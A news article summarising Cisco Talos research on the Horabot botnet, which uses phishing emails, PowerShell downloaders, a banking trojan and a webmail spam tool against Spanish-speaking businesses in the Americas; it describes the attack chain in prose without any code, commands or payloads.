Horabot campaign targeted businesses for more than two years before finally being discovered

Security researchers have issued a warning over a sophisticated malware botnet that has flown under the radar for more than two years.

Analysis by security firm Cisco Talos also found that organisations across “several business verticals” have been targeted by the botnet since November 2020.

Dubbed ‘Horabot’, the botnet was spotted infecting devices with a banking trojan and spam tools to steal sensitive financial information and assume control of user email accounts to wage phishing attacks.

Users of email services such as Gmail, Yahoo, and Outlook, have been impacted by the botnet, with their accounts used to send malicious emails to contacts.

“Horabot enables the threat actor to control the victim’s Outlook mailbox, exfiltrate contacts’ email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim’s mailbox,” researchers said.

“The banking trojan can collect the victim’s login credentials for various online accounts, operating system information and keystrokes. It also steals one-time security codes or soft tokens from the victim’s online banking applications.”

According to Talos, the botnet has specifically targeted Spanish-speaking users in the Americas, and could be based in Brazil.

Companies operating in the accounting, construction, engineering, and investment sectors are thought to have been particularly targeted by the botnet.

How does Horabot work?

Technical analysis from Cisco Talos revealed that the campaign is a “multi-stage attack chain” beginning with an initial phishing email. This then delivers a malicious payload via a PowerShell downloader script.

“When a victim opens the HTML file attachment, an embedded URL is launched in the victim’s browser, redirecting to another malicious HTML file from an attacker-controlled AWS EC2 instance,” researchers said in a blog post. “The content displayed on the victim’s browser lures them to click an embedded malicious hyperlink which downloads a RAR file.”

This payload was found to create specially crafted Windows shortcut files that run during the startup process of a victims machine and force it to restart.

Upon reboot, these malicious files enable the attacker to further infect the device.

“After the victim’s machine is rebooted, the malicious Windows startup files run the payloads by sideloading them to the legitimate executables and downloading and executing two other PowerShell scripts from a different attacker-controlled server,” the blog post explained.

“One is the PowerShell downloader script, which the attacker attempts to execute to re-infect the victim’s machine, and another is Horabot.”

Analysis of the banking trojan

Analysis from Talos found that the banking trojan used in this campaign specifically targets the victim’s login credentials and financial information.

This trojan enables the attacker to monitor activity on a victim’s device by collecting system information such as hostnames, IPv4 addresses, OS version information, and insights on anti-virus software present on the machine.

Data gathered by the trojan is then extracted to an attacker-controlled server, researchers added.

“The reconnaissance data is exfiltrated to the attacker-controlled server through an HTTP POST request,” Talos explained “The banking trojan targets the victim’s sensitive information, such as login credentials and financial transaction security codes, and logs keystrokes and manipulates the victim machine’s clipboard data.

“The trojan also has anti-analysis and anti-detection capabilities to evade the sandbox and virtual environments.”

Phishing spam tool

The second element of this botnet campaign involves the use of a spam tool, researchers explained. This acts as a secondary payload during the attack and enables the threat actor to assume control of the victim’s email accounts.

“The spam tool is a 32-bit DLL written in Delphi and, when run on the victim’s machine, will attempt to compromise the victim’s login credentials for webmail services such as Yahoo, Gmail, and Hotmail,” Cisco analysts explained.

Once user credentials have been compromised, this tool takes “full control” of the account and begins creating and circulating spam emails to contacts found in the victim’s mailbox.

This spambot also displayed “information-stealing capabilities”, including the ability to log keystrokes, capture screenshots, and track mouse activity on an infected computer.